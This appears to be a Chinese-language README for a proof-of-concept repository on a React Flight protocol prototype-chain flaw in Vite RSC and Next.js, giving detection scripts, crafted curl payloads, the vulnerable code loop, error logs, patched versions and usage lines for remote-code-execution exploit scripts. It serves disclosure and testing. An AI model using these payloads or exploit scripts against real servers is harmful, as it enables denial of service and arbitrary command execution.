React Flight 协议漏洞,允许通过块引用进行原型链遍历。针对 bullshit-react-project 进行测试。
以下内容略有过时,因为实际 PoC 现已公开。
Vite RSC:bash ./vite-detect.sh https://example.com
Next.js:bash ./nextjs-detect.sh https://example.com
或者同时检测两者,只需运行 bash ./detect.sh https://example.com
两个脚本都接受可选的超时参数(Vite 默认 3 秒,Next.js 默认 5 秒)。
发送带有 $1:toString 负载的 x-rsc-action 请求头。易受攻击的服务器会无限期挂起,已修补的服务器正常响应。首先检查 RSC 端点(无效操作时预期返回 HTTP 500)。
从页面响应中发现服务器操作 ID(格式为 $ACTION_ID_<hash>),然后发送:
curl -X POST "http://localhost:3000" \
-H "Next-Action: <action_id>" \
-H "Accept: text/x-component" \
-F '0=["$1:a:a"]' \
-F '1={}'
易受攻击的服务器挂起,已修补的服务器快速响应。
Next.js:升级到 16.0.7、15.5.7 或 15.4.8
React (Vite RSC):升级到 19.0.1+、19.1.2+ 或 19.2.1+
React 的 Flight 协议允许通过块引用进行原型链遍历。getOutlinedModel 函数在迭代引用路径时未进行 hasOwnProperty 检查:
for (key = 1; key < reference.length; key++)
parentObject = parentObject[reference[key]];
这使得 $1:constructor:constructor 能够遍历 {}.constructor.constructor → Function。
端点:任何带有 x-rsc-action 请求头的路径
操作 ID:710363d987f5#loginUser(或任何有效的服务器操作)
curl -X POST "http://localhost:4173/xyz" \
-H "x-rsc-action: 710363d987f5#loginUser" \
-F '0={"then":"$1:constructor:constructor"}' \
-F '1={"a":"b"}'
易受攻击:Internal Server Error
已修补:正常响应
注意,如果 x-rsc-action ID 错误,已修补的服务器也会返回 500 错误,只是服务器日志不同。
SyntaxError: Unexpected token 'function'
at Object.Function [as then] (<anonymous>)
当对象被 await 时,通过 .then() 调用了 Function 构造函数。V8 将 resolve/reject 函数作为参数传递,这些函数会被字符串化为 function () { [native code] }——因此产生语法错误。
Error: server reference not found '310363d987f5'
at Object.load (file:///tmp/team_9_year_3_project/dist/rsc/index.js:13532:27)
at requireModule (file:///tmp/team_9_year_3_project/dist/rsc/index.js:8302:20)
at loadServerAction (file:///tmp/team_9_year_3_project/dist/rsc/index.js:8326:17)
at handler (file:///tmp/team_9_year_3_project/dist/rsc/index.js:14998:29)
at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
TypeError: Cannot read properties of undefined (reading 'apply')
at AsyncLocalStorage.run (node:internal/async_local_storage/async_context_frame:63:14)
at runWithRequest (file:///tmp/team_9_year_3_project/dist/rsc/index.js:13539:25)
at handler (file:///tmp/team_9_year_3_project/dist/rsc/index.js:14999:27)
at process.processTicksAndRejections (node:internal/process/task_queues:103:5)
使用有效的 x-rsc-action 时不会出现服务器日志。可以通过运行一个真实的服务器操作并在开发者工具中捕获请求来找到正确的 x-rsc-action。
$1:toString 负载会导致易受攻击的服务器无限期挂起——这也是检测脚本所使用的。我尝试了几乎所有方法,但未能实现 RCE。
对于 Vite RSC:
bash exploit-vite.sh https://example.com/ 'echo $(id) > /tmp/pwned'
对于 Next.js:
bash exploit-nextjs.sh https://example.com/ 'echo $(id) > /tmp/pwned'
感谢 maple3142 → https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3
我只是做了一些封装并适配了 Vite,它使用纯 ESM,因此没有 require。